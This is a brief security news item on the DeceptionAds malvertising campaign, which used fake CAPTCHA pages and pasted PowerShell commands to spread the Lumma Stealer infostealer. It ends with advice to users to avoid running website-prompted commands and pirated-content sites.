A large-scale malvertising campaign, dubbed DeceptionAds, has been distributing the Lumma Stealer malware by tricking users into running malicious PowerShell commands on fake CAPTCHA pages. Guardio Labs and Infoblox researchers linked the operation to the threat actor Vane Viper, who leveraged the Monetag ad network to generate over one million impressions daily across thousands of websites.
Users are lured by pop-up ads from pirate software and streaming platforms, which redirect them through the BeMob cloaking service to evade detection. Once on the fake CAPTCHA page, a malicious PowerShell command is silently copied to the clipboard, and victims are instructed to paste it into the Windows Run dialog, unknowingly triggering malware installation.
Lumma Stealer is a powerful infostealer that extracts sensitive data, including credentials, cookies, credit cards, and cryptocurrency wallet information, from popular browsers like Chrome, Firefox, and Edge. The stolen data is archived and sent to the attackers for further exploitation or sale on cybercrime markets.
Monetag and BeMob acted swiftly to disrupt the campaign, removing hundreds of accounts within days, but the threat actors reappeared on another network shortly after. Researchers warn that infostealer campaigns are increasingly widespread, posing risks of financial fraud, data breaches, and ransomware attacks.
Users are advised to avoid executing any website-prompted commands and refrain from using pirated content sites, which often expose visitors to these malicious ads.
Read more...